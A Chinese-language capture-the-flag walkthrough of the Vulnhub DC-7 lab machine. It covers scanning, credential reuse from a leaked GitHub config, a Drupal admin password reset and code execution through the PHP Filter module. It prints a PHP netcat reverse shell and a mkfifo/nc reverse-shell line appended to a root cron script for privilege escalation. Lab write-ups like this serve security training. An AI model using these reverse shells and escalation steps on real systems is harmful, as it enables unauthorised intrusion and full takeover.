• Vulnhub实战靶场:DC-7


    一、环境搭建

    1、官网下载连接:https://www.vulnhub.com/entry/dc-7,356/

    2、下载之后,使用Oracle VM VirtualBox导入靶场环境

    3、为了正常练习,将靶场的网卡模式设置为桥接模式,启动即可

    二、靶场攻略

    1、惯例,使用命令:nmap -sP --min-hostgroup 1024 --min-parallelism 1024 10.10.114.0/24,快速探测存活主机,找到靶场ip

     2、探测启动的服务端口:nmap -A -p- 10.10.114.87

     

     3、访问端口,看到首页提示,暴力破解不能用,尝试登录失败五次会锁定,msf中直接打的exp也没打进去

    4、按照官网提示,可以在google里得到帮助,关键字跟网站下@DC7USER一样,就搜索了一下这个人

     发现了github账户,账户下有网站源码文件,里面有配置文件信息

     尝试登录网站发现不对

     尝试登录ssh,原来是ssh的账号密码

     5、使用命令ls,查看到有一个邮件

     查看邮件,发现几个关键脚本文件

     查看backups.sh文件,是一个定时root执行的备份文件的脚本

     drush是对密码进行操作的命令

     知道有admin账户,所以修改密码,输入命令:drush user-password  admin --password="nihao123!"

     重新去登录网站,登录成功

     6、打开管理页面去安装一个PHP扩展方便写入木马,扩展程序下载连接为:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz,下载完成之后,到管理的扩展界面,安装新插件即可

    安装完成之后,多出了一个PHP Filter

     启动扩展之后,到编辑菜单,编辑首页内容,内容代码选择php code,之后在内容中加入<?php phpinfo();?>,发现成功执行

     

     7、在文本中,写入要执行的反弹shell的命令:<?php system('nc -e /bin/bash 10.10.114.76 2345');>,kali攻击机使用nc接收之后,顺利拿到www账户的shell

    再使用命令:python -c "import pty;pty.spawn('/bin/bash')",拿到www权限的交互shell

     8、到备份脚本的页面,查看权限,知道只有root和www账户有对自动运行的backups.sh脚本有编辑权限

     使用命令:echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.114.76 3456 >/tmp/f" >> backups.sh,将反弹shell的命令,写入到backups.sh中

    等一段时间,备份脚本以root账户自动执行之后,顺利拿到root权限的shell,得到flag

     完

  • 相关阅读:
    模板方法模式
    结构型模式
    组合模式
    享元模式
    [STL离散化]Skyscrapers的lower_bound系列
    [水]浙大校赛补题
    [数]来自亮亮OJ的五道数学题
    [数]被数学淹没不知所措
    [tour]2019HUST onsite签到
    [树组BIT]训练两题重新理解ver.
  • 原文地址:https://www.cnblogs.com/sym945/p/13926313.html
Copyright © 2020-2023  润新知